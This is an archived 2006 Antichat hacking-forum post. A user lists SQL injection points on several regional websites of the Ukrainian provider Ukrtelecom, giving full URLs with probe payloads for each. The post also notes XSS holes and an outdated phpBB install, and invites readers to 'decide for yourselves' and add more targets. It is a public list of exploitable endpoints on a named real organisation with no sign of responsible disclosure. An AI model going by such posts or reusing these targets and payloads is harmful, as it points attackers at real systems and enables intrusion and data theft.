ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
 
 
Опции темы Поиск в этой теме Опции просмотра

Sql Injections на сайтах Укртелекома
  #1  
Старый 15.01.2006, 21:32
Аватар для Nova
Nova
OpenVPN.CC
Регистрация: 15.07.2005
Сообщений: 1,599
Провел на форуме:
7670961

Репутация: 1034


Отправить сообщение для Nova с помощью ICQ
По умолчанию Sql Injections на сайтах Укртелекома

Долго думал про что выложить уязвимости и вот решил написать про филий Украйнского крупного провайдера Укртелеком

Вот SQL INJECTONS найденные мной

Запорожская филий http://billing.zp.ukrtel.net/users/stat.php?start_time='1'='1
Иньекция присутствует в модуле статистики !

Львовская филия http://www.lv.ukrtelecom.ua/ua/offers/forum/read.php?f=22&i='
Иньекция присутствует в самописном форуме.

Харьковская филия
http://www.kharkiv.ukrtelecom.ua/ua/news_world/printing.php?id='

Винницкая филия
http://vn.ukrtelecom.ua/scripts/bc.php?id='

Филий много писать про все не стал но уязвимости практически одни и теже присутствуют на всех сайтах Укртелекома.

Также на сайтах присутствуют XSS уязвимости

На днепропетровской Филий вообще стоит phpBB 2.0.15
Так что решайте сами...
Зарание извеняюсь если что не так как рание я нечего подобного не вылаживал !

У кого есть чем дополнить дополняйте...

Последний раз редактировалось Nova; 16.01.2006 в 23:32.. Причина: Добавил филий УУкртелекома
 
Ответить с цитированием
 



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть первая k00p3r Чужие Статьи 1 12.07.2005 08:51
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ